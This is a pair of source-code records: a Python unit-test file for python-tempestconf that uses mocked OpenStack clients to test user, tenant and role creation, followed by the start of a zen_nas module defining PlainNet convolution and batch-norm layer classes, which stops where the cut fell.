config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
config_tempest/tests/test_config_tempest_user.py
|
mail2nsrajesh/python-tempestconf
|
ab53cc8638f51283bbef183a01113478e362434f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from config_tempest import config_tempest as tool
from config_tempest.tests.base import BaseConfigTempestTest
import mock
from tempest.lib import exceptions
class TestCreateTempestUser(BaseConfigTempestTest):
    """Tests for ``config_tempest.create_tempest_users``."""
    def setUp(self):
        super(TestCreateTempestUser, self).setUp()
        self.conf = self._get_conf("v2.0", "v3")
        self.tenants_client = self._get_clients(self.conf).tenants
        self.users_client = self._get_clients(self.conf).users
        self.roles_client = self._get_clients(self.conf).roles
    @mock.patch('config_tempest.config_tempest.'
                'create_user_with_tenant')
    @mock.patch('config_tempest.config_tempest.give_role_to_user')
    def _test_create_tempest_user(self,
                                  mock_give_role_to_user,
                                  mock_create_user_with_tenant,
                                  services):
        """Drive create_tempest_users and verify the exact mock call lists.

        When 'orchestration' is in *services*, an extra heat_stack_owner
        role grant (role_required=False) is expected.
        """
        alt_username = "my_user"
        alt_password = "my_pass"
        alt_tenant_name = "my_tenant"
        self.conf.set("identity", "alt_username", alt_username)
        self.conf.set("identity", "alt_password", alt_password)
        self.conf.set("identity", "alt_tenant_name", alt_tenant_name)
        tool.create_tempest_users(self.tenants_client,
                                  self.roles_client,
                                  self.users_client,
                                  self.conf,
                                  services=services)
        if 'orchestration' in services:
            # Exact, ordered call list: admin role first, then the
            # optional heat_stack_owner role.
            self.assertEqual(mock_give_role_to_user.mock_calls, [
                mock.call(self.tenants_client,
                          self.roles_client,
                          self.users_client,
                          self.conf.get('identity',
                                        'admin_username'),
                          self.conf.get('identity',
                                        'tenant_name'),
                          role_name='admin'),
                mock.call(self.tenants_client,
                          self.roles_client,
                          self.users_client,
                          self.conf.get('identity',
                                        'username'),
                          self.conf.get('identity',
                                        'tenant_name'),
                          role_name='heat_stack_owner',
                          role_required=False),
                ])
        else:
            mock_give_role_to_user.assert_called_with(
                self.tenants_client, self.roles_client,
                self.users_client,
                self.conf.get('identity', 'admin_username'),
                self.conf.get('identity', 'tenant_name'),
                role_name='admin')
        # Both the primary and the alt user must be created, in order.
        self.assertEqual(mock_create_user_with_tenant.mock_calls, [
            mock.call(self.tenants_client,
                      self.users_client,
                      self.conf.get('identity', 'username'),
                      self.conf.get('identity', 'password'),
                      self.conf.get('identity', 'tenant_name')),
            mock.call(self.tenants_client,
                      self.users_client,
                      self.conf.get('identity', 'alt_username'),
                      self.conf.get('identity', 'alt_password'),
                      self.conf.get('identity', 'alt_tenant_name')),
            ])
    def test_create_tempest_user(self):
        services = ['compute', 'network']
        self._test_create_tempest_user(services=services)
    def test_create_tempest_user_with_orchestration(self):
        services = ['compute', 'network', 'orchestration']
        self._test_create_tempest_user(services=services)
class TestCreateUserWithTenant(BaseConfigTempestTest):
    """Tests for ``config_tempest.create_user_with_tenant`` covering the
    fresh-create path and the Conflict (already-exists) fallbacks."""
    def setUp(self):
        super(TestCreateUserWithTenant, self).setUp()
        self.conf = self._get_conf("v2.0", "v3")
        self.tenants_client = self._get_clients(self.conf).tenants
        self.users_client = self._get_clients(self.conf).users
        self.username = "test_user"
        self.password = "cryptic"
        self.tenant_name = "project"
        self.tenant_description = "Tenant for Tempest %s user" % self.username
        self.email = "%s@test.com" % self.username
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.tenants_client.'
                'TenantsClient.create_tenant')
    @mock.patch('tempest.lib.services.identity.v2.users_client.'
                'UsersClient.create_user')
    def test_create_user_with_tenant(self,
                                     mock_create_user,
                                     mock_create_tenant,
                                     mock_get_tenant_by_name):
        """Happy path: tenant and user are both created."""
        mock_get_tenant_by_name.return_value = {'id': "fake-id"}
        tool.create_user_with_tenant(
            tenants_client=self.tenants_client,
            users_client=self.users_client,
            username=self.username,
            password=self.password,
            tenant_name=self.tenant_name)
        mock_create_tenant.assert_called_with(
            name=self.tenant_name, description=self.tenant_description)
        mock_create_user.assert_called_with(name=self.username,
                                            password=self.password,
                                            tenantId="fake-id",
                                            email=self.email)
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch(
        'tempest.lib.services.identity.v2.'
        'tenants_client.TenantsClient.create_tenant')
    @mock.patch('tempest.lib.services.identity.v2'
                '.users_client.UsersClient.create_user')
    def test_create_user_with_tenant_tenant_exists(
            self,
            mock_create_user,
            mock_create_tenant,
            mock_get_tenant_by_name):
        """create_tenant raises Conflict; the existing tenant is looked up."""
        mock_get_tenant_by_name.return_value = {'id': "fake-id"}
        exc = exceptions.Conflict
        mock_create_tenant.side_effect = exc
        tool.create_user_with_tenant(
            tenants_client=self.tenants_client,
            users_client=self.users_client,
            username=self.username,
            password=self.password,
            tenant_name=self.tenant_name)
        mock_create_tenant.assert_called_with(
            name=self.tenant_name, description=self.tenant_description)
        mock_create_user.assert_called_with(
            name=self.username,
            password=self.password,
            tenantId="fake-id",
            email=self.email)
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.update_user_password')
    @mock.patch('tempest.common.identity.get_user_by_username')
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.'
                'tenants_client.TenantsClient.create_tenant')
    @mock.patch('tempest.lib.services.identity.'
                'v2.users_client.UsersClient.create_user')
    def test_create_user_with_tenant_user_exists(
            self, mock_create_user, mock_create_tenant,
            mock_get_tenant_by_name,
            mock_get_user_by_username,
            mock_update_user_password):
        """create_user raises Conflict; the existing user's password is reset."""
        mock_get_tenant_by_name.return_value = {'id': "fake-id"}
        exc = exceptions.Conflict
        mock_create_user.side_effect = exc
        fake_user = {'id': "fake_user_id"}
        mock_get_user_by_username.return_value = fake_user
        tool.create_user_with_tenant(
            tenants_client=self.tenants_client,
            users_client=self.users_client,
            username=self.username, password=self.password,
            tenant_name=self.tenant_name)
        mock_create_tenant.assert_called_with(
            name=self.tenant_name, description=self.tenant_description)
        mock_create_user.assert_called_with(name=self.username,
                                            password=self.password,
                                            tenantId="fake-id",
                                            email=self.email)
        mock_update_user_password.assert_called_with(
            fake_user['id'], password=self.password)
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.update_user_password')
    @mock.patch('tempest.common.identity.get_user_by_username')
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.'
                'tenants_client.TenantsClient.create_tenant')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.create_user')
    def test_create_user_with_tenant_exists_user_exists(
            self, mock_create_user, mock_create_tenant,
            mock_get_tenant_by_name,
            mock_get_user_by_username,
            mock_update_user_password):
        """Both tenant and user already exist; both Conflict paths are taken."""
        mock_get_tenant_by_name.return_value = {'id': "fake-id"}
        exc = exceptions.Conflict
        # BUG FIX: was 'side_effects' (a typo Mock accepts silently), so
        # create_tenant never raised and the tenant-exists path was untested.
        mock_create_tenant.side_effect = exc
        mock_create_user.side_effect = exc
        fake_user = {'id': "fake_user_id"}
        mock_get_user_by_username.return_value = fake_user
        tool.create_user_with_tenant(tenants_client=self.tenants_client,
                                     users_client=self.users_client,
                                     username=self.username,
                                     password=self.password,
                                     tenant_name=self.tenant_name)
        mock_create_tenant.assert_called_with(
            name=self.tenant_name, description=self.tenant_description)
        mock_create_user.assert_called_with(name=self.username,
                                            password=self.password,
                                            tenantId="fake-id",
                                            email=self.email)
        mock_update_user_password.assert_called_with(
            fake_user['id'], password=self.password)
class TestGiveRoleToUser(BaseConfigTempestTest):
    """Unit tests for tool.give_role_to_user with mocked v2 identity clients."""
    def setUp(self):
        """Build conf-backed clients plus canned list_users/list_roles payloads."""
        super(TestGiveRoleToUser, self).setUp()
        self.conf = self._get_conf("v2.0", "v3")
        self.tenants_client = self._get_clients(self.conf).tenants
        self.users_client = self._get_clients(self.conf).users
        self.roles_client = self._get_clients(self.conf).roles
        self.username = "test_user"
        self.tenant_name = "project"
        self.role_name = "fake_role"
        # canned list_users response: the target user plus one decoy entry
        self.users = {'users':
                      [{'name': "test_user",
                        'id': "fake_user_id"},
                       {'name': "test_user2",
                        'id': "fake_user_id2"}]}
        # canned list_roles response: the target role plus one decoy entry
        self.roles = {'roles':
                      [{'name': "fake_role",
                        'id': "fake_role_id"},
                       {'name': "fake_role2",
                        'id': "fake_role_id2"}]}
    # NOTE: mock.patch decorators apply bottom-up, so the mock arguments of
    # each test method arrive in reverse order of the decorators.
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.list_users')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.create_user')
    @mock.patch('tempest.lib.services.identity.v2.'
                'roles_client.RolesClient.list_roles')
    # the adjacent literals below ('...v2.' '' 'roles_client.') are joined by
    # implicit string concatenation; the empty '' in between is harmless
    @mock.patch('tempest.lib.services.identity.v2.''roles_client.'
                'RolesClient.create_user_role_on_project')
    def test_give_role_to_user(self,
                               mock_create_user_role_on_project,
                               mock_list_roles,
                               mock_create_user,
                               mock_list_users,
                               mock_get_tenant_by_name):
        """Happy path: the role id is assigned to the user id on the tenant."""
        mock_get_tenant_by_name.return_value = \
            {'id': "fake_tenant_id"}
        mock_list_users.return_value = self.users
        mock_list_roles.return_value = self.roles
        tool.give_role_to_user(
            tenants_client=self.tenants_client,
            roles_client=self.roles_client,
            users_client=self.users_client,
            username=self.username,
            tenant_name=self.tenant_name,
            role_name=self.role_name)
        mock_create_user_role_on_project.assert_called_with(
            "fake_tenant_id", "fake_user_id", "fake_role_id")
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.'
                'v2.users_client.UsersClient.list_users')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.create_user')
    @mock.patch('tempest.lib.services.identity.v2.'
                'roles_client.RolesClient.list_roles')
    @mock.patch('tempest.lib.services.identity.v2.'
                'roles_client.RolesClient.create_user_role_on_project')
    def test_give_role_to_user_role_not_found(
            self,
            mock_create_user_role_on_project,
            mock_list_roles,
            mock_create_user,
            mock_list_users,
            mock_get_tenant_by_name):
        """A role name missing from list_roles makes the call raise."""
        role_name = "fake_role_that_does_not_exist"
        mock_get_tenant_by_name.return_value = \
            {'id': "fake_tenant_id"}
        mock_list_users.return_value = self.users
        mock_list_roles.return_value = self.roles
        exc = Exception
        self.assertRaises(exc,
                          tool.give_role_to_user,
                          tenants_client=self.tenants_client,
                          roles_client=self.roles_client,
                          users_client=self.users_client,
                          username=self.username,
                          tenant_name=self.tenant_name,
                          role_name=role_name)
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.list_users')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.create_user')
    @mock.patch('tempest.lib.services.identity.v2.'
                'roles_client.RolesClient.list_roles')
    @mock.patch('tempest.lib.services.identity.v2.roles_client'
                '.RolesClient.create_user_role_on_project')
    def test_give_role_to_user_role_not_found_not_req(
            self,
            mock_create_user_role_on_project,
            mock_list_roles,
            mock_create_user,
            mock_list_users,
            mock_get_tenant_by_name):
        """With role_required=False a missing role must not raise."""
        mock_get_tenant_by_name.return_value = \
            {'id': "fake_tenant_id"}
        mock_list_users.return_value = self.users
        mock_list_roles.return_value = self.roles
        tool.give_role_to_user(
            tenants_client=self.tenants_client,
            roles_client=self.roles_client,
            users_client=self.users_client,
            username=self.username,
            tenant_name=self.tenant_name,
            role_name=self.role_name,
            role_required=False)
    @mock.patch('tempest.common.identity.get_tenant_by_name')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.list_users')
    @mock.patch('tempest.lib.services.identity.v2.'
                'users_client.UsersClient.create_user')
    @mock.patch('tempest.lib.services.identity.v2.'
                'roles_client.RolesClient.list_roles')
    @mock.patch('tempest.lib.services.identity.v2.roles_client.'
                'RolesClient.create_user_role_on_project')
    def test_give_role_to_user_role_already_given(
            self,
            mock_create_user_role_on_project,
            mock_list_roles,
            mock_create_user,
            mock_list_users,
            mock_get_tenant_by_name):
        """A Conflict from the assignment call is tolerated (role already set)."""
        exc = exceptions.Conflict
        mock_create_user_role_on_project.side_effect = exc
        mock_get_tenant_by_name.return_value = {'id': "fake_tenant_id"}
        mock_list_users.return_value = self.users
        mock_list_roles.return_value = self.roles
        tool.give_role_to_user(
            tenants_client=self.tenants_client,
            roles_client=self.roles_client,
            users_client=self.users_client,
            username=self.username,
            tenant_name=self.tenant_name,
            role_name=self.role_name)
| 45.665768
| 78
| 0.603471
| 1,880
| 16,942
| 5.079255
| 0.087234
| 0.046078
| 0.06032
| 0.051733
| 0.840507
| 0.79202
| 0.763745
| 0.755158
| 0.753273
| 0.751388
| 0
| 0.004075
| 0.304687
| 16,942
| 370
| 79
| 45.789189
| 0.806537
| 0.035061
| 0
| 0.685801
| 0
| 0
| 0.199914
| 0.14891
| 0
| 0
| 0
| 0
| 0.045317
| 1
| 0.042296
| false
| 0.063444
| 0.012085
| 0
| 0.063444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
da8e649188e593bf4ffeec20d7be755b1ffb5894
| 57,065
|
py
|
Python
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 7
|
2021-10-30T07:37:45.000Z
|
2022-03-28T08:31:15.000Z
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 3
|
2021-11-08T06:23:12.000Z
|
2022-01-07T09:10:57.000Z
|
src/zen_nas/PlainNet/basic_blocks.py
|
Adlik/zen_nas
|
d820d5c7d5bbb6fd66a76d5f16513647d6ea7a57
|
[
"Apache-2.0"
] | 1
|
2022-01-06T01:40:18.000Z
|
2022-01-06T01:40:18.000Z
|
'''
Copyright (C) 2010-2021 Alibaba Group Holding Limited.
Define all needed basic layer classes.
'''
# pylint: disable=W0613,too-many-lines,too-many-arguments
import os
import sys
import uuid
import torch
from torch import nn
import torch.nn.functional as F
import numpy as np
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
try:
from PlainNet import _get_right_parentheses_index_, _create_netblock_list_from_str_
except ImportError:
print('fail to import zen_nas modules')
# pylint: disable=no-self-use,invalid-name
class PlainNetBasicBlockClass(nn.Module):
    """Base class for all PlainNet basic blocks.

    A block knows its ``in_channels``/``out_channels``/``stride`` and how to
    (de)serialize itself from the structure string used by zen-NAS.  Subclasses
    must implement the accounting hooks (``get_FLOPs`` etc.) and ``forward``.
    """
    def __init__(self, in_channels=None, out_channels=None, stride=1, no_create=False, block_name=None, **kwargs):
        super().__init__(**kwargs)
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.stride = stride
        # no_create=True means "bookkeeping only": subclasses skip building
        # the actual torch module.
        self.no_create = no_create
        self.block_name = block_name
        if self.block_name is None:
            # auto-generate a unique name so __repr__ round-trips
            self.block_name = f'uuid{uuid.uuid4().hex}'
    def forward(self, input_):
        """Subclass implementation required."""
        # NotImplementedError subclasses RuntimeError, so existing callers
        # catching RuntimeError keep working.
        raise NotImplementedError('Not implemented')
    def __str__(self):
        return type(self).__name__ + f'({self.in_channels},{self.out_channels},{self.stride})'
    def __repr__(self):
        return type(self).__name__ + f'({self.block_name}|{self.in_channels},{self.out_channels},{self.stride})'
    def get_output_resolution(self, input_resolution):
        """Subclass implementation required: output spatial resolution."""
        raise NotImplementedError('Not implemented')
    def get_FLOPs(self, input_resolution):
        """Subclass implementation required: FLOPs at the given resolution."""
        raise NotImplementedError('Not implemented')
    def get_model_size(self):
        """Subclass implementation required: number of parameters."""
        raise NotImplementedError('Not implemented')
    def set_in_channels(self, channels):
        """Subclass implementation required: re-target the input channels."""
        raise NotImplementedError('Not implemented')
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``ClassName([name|]in,out,stride)...`` from ``struct_str``.

        :param struct_str: structure string starting with this block's encoding
        :param no_create: forwarded to the constructor (skip module creation)
        :return: (block instance, remaining unparsed string)
        """
        assert PlainNetBasicBlockClass.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len(cls.__name__ + '('):idx]
        # an optional "name|" prefix carries the block name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        param_str_split = param_str.split(',')
        in_channels = int(param_str_split[0])
        out_channels = int(param_str_split[1])
        stride = int(param_str_split[2])
        return cls(in_channels=in_channels, out_channels=out_channels, stride=stride,
                   block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
    @classmethod
    def is_instance_from_str(cls, struct_str):
        """Return True when ``struct_str`` starts with this block's encoding."""
        return struct_str.startswith(cls.__name__ + '(') and struct_str.endswith(')')
class AdaptiveAvgPool(PlainNetBasicBlockClass):
    """Adaptive average pooling to a square ``output_size`` map; channel count unchanged."""
    def __init__(self, out_channels, output_size, no_create=False, **kwargs):
        super().__init__(**kwargs)
        # pooling preserves channels, so in == out here
        self.in_channels = out_channels
        self.out_channels = out_channels
        self.output_size = output_size
        self.no_create = no_create
        if no_create:
            return
        self.netblock = nn.AdaptiveAvgPool2d(output_size=(self.output_size, self.output_size))
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        # NOTE(review): prints out_channels // output_size**2 although
        # create_from_str reads the first field back as the raw out_channels —
        # consistent only for output_size == 1; confirm intended format.
        channels = self.out_channels // self.output_size ** 2
        return f'{type(self).__name__}({channels},{self.output_size})'
    def __repr__(self):
        return type(self).__name__ + f'({self.block_name}|{self.out_channels // self.output_size ** 2},\
            {self.output_size})'
    def get_output_resolution(self, input_resolution):
        # output resolution is fixed regardless of the input resolution
        return self.output_size
    def get_FLOPs(self, input_resolution):
        # pooling is counted as free in this accounting scheme
        return 0
    def get_model_size(self):
        return 0
    def set_in_channels(self, channels):
        self.in_channels = channels
        self.out_channels = channels
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``AdaptiveAvgPool([name|]channels,size)``; return (block, rest)."""
        assert AdaptiveAvgPool.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('AdaptiveAvgPool('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        fields = param_str.split(',')
        return AdaptiveAvgPool(out_channels=int(fields[0]), output_size=int(fields[1]),
                               block_name=block_name, no_create=no_create), struct_str[idx + 1:]
class BN(PlainNetBasicBlockClass):
    """Batch-normalization block: adopts an existing ``nn.BatchNorm2d`` or builds one."""
    def __init__(self, out_channels=None, copy_from=None, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is None:
            # BN keeps the channel count, so in == out
            self.in_channels = out_channels
            self.out_channels = out_channels
            if not no_create:
                self.netblock = nn.BatchNorm2d(num_features=self.out_channels)
        else:
            # adopt the given module; its weight length defines the channel count
            assert isinstance(copy_from, nn.BatchNorm2d)
            num_features = copy_from.weight.shape[0]
            self.in_channels = num_features
            self.out_channels = num_features
            assert out_channels is None or out_channels == self.out_channels
            self.netblock = copy_from
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        return f'BN({self.out_channels})'
    def __repr__(self):
        return f'BN({self.block_name}|{self.out_channels})'
    def get_output_resolution(self, input_resolution):
        # element-wise op: resolution unchanged
        return input_resolution
    def get_FLOPs(self, input_resolution):
        # one scale/shift per activation
        return input_resolution ** 2 * self.out_channels
    def get_model_size(self):
        return self.out_channels
    def set_in_channels(self, channels):
        """Re-target the BN to a new channel count, rebuilding the layer."""
        self.in_channels = channels
        self.out_channels = channels
        if self.no_create:
            return
        self.netblock = nn.BatchNorm2d(num_features=self.out_channels)
        self.netblock.train()
        self.netblock.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``BN([name|]channels)``; return (block, remaining string)."""
        assert BN.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('BN('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        return BN(out_channels=int(param_str), block_name=block_name,
                  no_create=no_create), struct_str[idx + 1:]
# pylint: disable=too-many-instance-attributes
class ConvKX(PlainNetBasicBlockClass):
    """K x K (optionally grouped) 2D convolution block, bias-free.

    Either adopts an existing ``nn.Conv2d`` via ``copy_from`` or builds one from
    the given hyper-parameters.  ``no_create`` (or any zero hyper-parameter)
    skips module creation so the block can be used for FLOPs/size accounting.
    """
    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, groups=1, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is not None:
            # adopt the existing conv and cross-check any explicit hyper-params
            assert isinstance(copy_from, nn.Conv2d)
            self.in_channels = copy_from.in_channels
            self.out_channels = copy_from.out_channels
            self.kernel_size = copy_from.kernel_size[0]
            self.stride = copy_from.stride[0]
            self.groups = copy_from.groups
            # bug fix: padding was never recorded in this branch, which made a
            # later set_in_channels() fail with AttributeError
            self.padding = copy_from.padding[0]
            assert in_channels is None or in_channels == self.in_channels
            assert out_channels is None or out_channels == self.out_channels
            assert kernel_size is None or kernel_size == self.kernel_size
            assert stride is None or stride == self.stride
            self.netblock = copy_from
        else:
            self.in_channels = in_channels
            self.out_channels = out_channels
            self.stride = stride
            self.groups = groups
            self.kernel_size = kernel_size
            # "same"-style padding for odd kernel sizes
            self.padding = (self.kernel_size - 1) // 2
            if no_create or self.in_channels == 0 or self.out_channels == 0 or \
                    self.kernel_size == 0 or self.stride == 0:
                return
            self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
                                      kernel_size=self.kernel_size, stride=self.stride,
                                      padding=self.padding, bias=False, groups=self.groups)
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        # bug fix: the original used a backslash continuation INSIDE the string
        # literal, embedding source indentation into the serialized structure
        # string (round-trip still worked only because int() strips whitespace)
        return type(self).__name__ + f'({self.in_channels},{self.out_channels},{self.kernel_size},{self.stride})'
    def __repr__(self):
        return type(self).__name__ + \
            f'({self.block_name}|{self.in_channels},{self.out_channels},{self.kernel_size},{self.stride})'
    def get_output_resolution(self, input_resolution):
        return input_resolution // self.stride
    def get_FLOPs(self, input_resolution):
        """Multiply-accumulates of the conv at ``input_resolution`` (bias-free)."""
        return self.in_channels * self.out_channels * self.kernel_size ** 2 * \
            input_resolution ** 2 // self.stride ** 2 // self.groups
    def get_model_size(self):
        """Number of weight parameters (no bias)."""
        return self.in_channels * self.out_channels * self.kernel_size ** 2 // self.groups
    def set_in_channels(self, channels):
        """Change the input channel count and rebuild the conv accordingly."""
        self.in_channels = channels
        if not self.no_create:
            # bug fix: the rebuilt conv previously dropped ``groups``, silently
            # turning grouped convolutions (e.g. ConvKXG2..G32) into dense ones
            self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
                                      kernel_size=self.kernel_size, stride=self.stride,
                                      padding=self.padding, bias=False, groups=self.groups)
            self.netblock.train()
            self.netblock.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``ClassName([name|]in,out,kernel,stride)``; return (block, rest)."""
        assert cls.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len(cls.__name__ + '('):idx]
        # an optional "name|" prefix carries the block name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        split_str = param_str.split(',')
        in_channels = int(split_str[0])
        out_channels = int(split_str[1])
        kernel_size = int(split_str[2])
        stride = int(split_str[3])
        return cls(in_channels=in_channels, out_channels=out_channels,
                   kernel_size=kernel_size, stride=stride, no_create=no_create,
                   block_name=tmp_block_name), struct_str[idx + 1:]
class ConvDW(PlainNetBasicBlockClass):
    """Depthwise K x K convolution block (groups == channels, in == out)."""
    def __init__(self, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is None:
            # depthwise: input and output channel counts coincide
            self.in_channels = out_channels
            self.out_channels = out_channels
            self.stride = stride
            self.kernel_size = kernel_size
            # "same"-style padding for odd kernel sizes
            self.padding = (self.kernel_size - 1) // 2
            degenerate = (self.in_channels == 0 or self.out_channels == 0
                          or self.kernel_size == 0 or self.stride == 0)
            if no_create or degenerate:
                return
            self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
                                      kernel_size=self.kernel_size, stride=self.stride,
                                      padding=self.padding, bias=False, groups=self.in_channels)
        else:
            # adopt the given conv and cross-check any explicit hyper-params
            # NOTE(review): self.padding is not set in this branch, so a later
            # set_in_channels() would fail — confirm copy_from path usage.
            assert isinstance(copy_from, nn.Conv2d)
            self.in_channels = copy_from.in_channels
            self.out_channels = copy_from.out_channels
            self.kernel_size = copy_from.kernel_size[0]
            self.stride = copy_from.stride[0]
            assert self.in_channels == self.out_channels
            assert out_channels is None or out_channels == self.out_channels
            assert kernel_size is None or kernel_size == self.kernel_size
            assert stride is None or stride == self.stride
            self.netblock = copy_from
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        return f'ConvDW({self.out_channels},{self.kernel_size},{self.stride})'
    def __repr__(self):
        return f'ConvDW({self.block_name}|{self.out_channels},{self.kernel_size},{self.stride})'
    def get_output_resolution(self, input_resolution):
        return input_resolution // self.stride
    def get_FLOPs(self, input_resolution):
        # one filter per channel, hence no in_channels factor
        return self.out_channels * self.kernel_size ** 2 * input_resolution ** 2 // self.stride ** 2
    def get_model_size(self):
        return self.out_channels * self.kernel_size ** 2
    def set_in_channels(self, channels):
        """Re-target the channel count (in == out) and rebuild the conv."""
        self.in_channels = channels
        self.out_channels = self.in_channels
        if self.no_create:
            return
        self.netblock = nn.Conv2d(in_channels=self.in_channels, out_channels=self.out_channels,
                                  kernel_size=self.kernel_size, stride=self.stride,
                                  padding=self.padding, bias=False, groups=self.in_channels)
        self.netblock.train()
        self.netblock.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``ConvDW([name|]channels,kernel,stride)``; return (block, rest)."""
        assert ConvDW.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('ConvDW('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        fields = param_str.split(',')
        return ConvDW(out_channels=int(fields[0]),
                      kernel_size=int(fields[1]), stride=int(fields[2]), no_create=no_create,
                      block_name=block_name), struct_str[idx + 1:]
class ConvKXG2(ConvKX):
    """ConvKX specialized to a grouped convolution with 2 groups."""
    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=kernel_size, stride=stride, groups=2,
                         copy_from=copy_from, no_create=no_create, **kwargs)
class ConvKXG4(ConvKX):
    """ConvKX specialized to a grouped convolution with 4 groups."""
    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=kernel_size, stride=stride, groups=4,
                         copy_from=copy_from, no_create=no_create, **kwargs)
class ConvKXG8(ConvKX):
    """ConvKX specialized to a grouped convolution with 8 groups."""
    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=kernel_size, stride=stride, groups=8,
                         copy_from=copy_from, no_create=no_create, **kwargs)
class ConvKXG16(ConvKX):
    """ConvKX specialized to a grouped convolution with 16 groups."""
